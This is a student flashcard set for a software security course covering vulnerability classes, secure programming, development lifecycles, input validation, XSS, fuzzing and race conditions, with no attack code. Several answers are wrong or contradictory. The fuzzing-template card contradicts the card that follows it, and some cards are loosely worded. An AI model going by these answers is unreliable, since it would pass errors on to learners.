CNIT 271: Software Security

Three categories of security vulnerabilities resulting from poor programming?

Insecure interaction between components, risky resource management, porous defenses

What are some software error examples from insecure interactions between components?

SQL injection, OS command injection, Cross-site scripting, reverse shells, cross-site request forgery, “open redirect”

What are some software error examples from risky resource management?

Buffer copy wihtout checking size, path traversal, download of code without integrity checks, using dangerous functions, interger overflow or wraparound

What are some software error examples from porous defenses?

Missing authentication and authorization, use of hard-coded credentials, missing encryption, reliance on untrusted inputs, incorrect access controls, one way hashes without a salt

What are the five critical web application security flaws?

Unvalidated input, cross-site scripting, buffer overflow, injection flaws, improper error handling

T/F: Emphasis should be placed on the need for software developers to address these known areas of concern when addressing critical web application security flaws.

True

Why do critical web application security flaws occur?

They often occur due to a lack of secure coding practices, insufficient testing, and failure to properly validate user inputs.

What is software quality and reliability concerned with?

Accidental failure of programs as a result of some theoretically random, unanticipaed input, system interaction, or use of incorrect code.

How are software quality and reliability improved?

By using structured design and testing to identify and eliminate as many bugs as possible from a program

What is a big concern with software quality and reliability?

How often bugs are triggered rather than how many bugs there are.

What is defensive programming?

Designing and implementing software so that it continues to function even when under attack.

What does defensive programming require attention to?

All aspects of program execution, environment, and type of data it processes

T/F: Defensive programming is also known as blue teaming.

False

What is defensive programming also known as?

Secure programming

T/F: Assumptions must be validated by the program and all potential failures must be handled gracefully and safely

True

T/F: Programmers are often sure in what types of input a program will receive and the environment it executes in.

False, they assume

What are the steps of the software development lifecycle (SDLC)?

Initiate, define, design, build, test, roll out, operate, dispose

What are the steps of the waterfall development cycle?

Requirement gathering and analysis, system design, implementation, integration and testing, deployment of system, maintenance

What is the agile development cycle?

Agile is based on small project iterations, or sprints, for developing the software instead of long project schedules

T/F: Organizations that use the SDLC produce smaller deliverables more frequently and evalue a large project in terms of its individual pieces as they are completed.

False, agile development cycle is used to do this

How long is the typical duration of a sprint in the agile development cycle?

One to four weeks

What organization develops publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development?

SAFECode

What is a very common failing when handling prgram input?

Incorrect handling.

How do you prevent incorrect handling?

Identify all data sources and explicitly validate assumptions on size and types of values before use.

T/F: Programmers often make assumptions about the minimum expected size of input.

False, maximum

T/F: Oftentimes, the allocated buffer size is not confirmed, which leads to buffer overflow.

True

T/F: Safe coding treats all input as secure

False

T/F: Testing of inputs may not identify the vulnerability since the inputs are unlikely to include large enough inputs to trigger the overflow

True

Program may be _______ or _______.

binary, text

What is a recent example of a failure to check the validity of a binary input value?

2014 Heartbleed OpenSSL bug.

What is an injection attack?

A flaw related to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program.

Where do injection attacks most often occur in?

scripting languages

What are the two ways to interact with the OS?

Reading and writing system files from disk, and direct command execution

T/F: Both ways to interact with the OS are restricted by privileges and permissions

True

What are some countermeasures of SQL injection attacks?

Secure software development, input validation and sanitization

__________ is used for internationalization.

Unicode

T/F: Many Unicode decoders accept any valid equivalent sequence

True

What is canonicalization?

Transforming input data into a single, standard, minimal representation

What happens after canonicalization?

Input data can be compared with a single representation of acceptable input values

T/F: Floating point numbers depend on the processor used

True

T/F: Values may be signed or unsigned in validating numeric input

True

What is input fuzzing?

Software testing technique that uses randomly generated data as inputs to a program to discover vulnerabilities and unexpected behavior.

T/F: Input fuzzing can use templates to generate classes of known problem inputs

False

What is the disadvantage of using templates in input fuzzing?

Bugs triggered by other forms of input would be missed

What are cross site scripting attacks?

Attacks where input provided by one user is subsequently output to another user

XSS attacks are commonly seen in __________

Scripted web applications.

How are XSS attacks carried out?

Involves the inclusion of script code in the HTML context.

What is the XSS reflection vulnerability?

Attackers include the malicious script content in data supplied to a site

T/F: The XSS attack assumes that all content from one site is equally trusted and hence is permitted to interact with other content from the site

True

Security issues mainly arise due to issues in the following:

Correct algorithm implementation, correct machine instructions for algorithm, valid manipulation of data

T/F: A consequence of an incorrect algorithm implementation results in a bug that could be exploited

True

T/F: Another variant is when the programmers deliberately include

additional code in a program to help test and debug it

True

T/F: There are no issues with dynamic memory allocation

False, dynamic memory allocation can cause vulnerabilities like memory leaks and buffer overflows.

T/F: Programs execute on systems under the control of a processor clock

False, an operating system

What is a race condition vulnerability?

Occurs when an application has access to the same shared data and attempts to change variables within it simultaneously.

Applications can become vulnerable to race conditions if they interact with other applications that use parallel processing or multiple threads

parallel processing, multiple threads

If shared memory locations are not adequately secured, race conditions can occur – results into

data corruption, application errors, system crashes

Most common technique to prevent race conditions is

acquire a lock on the shared file for synchronization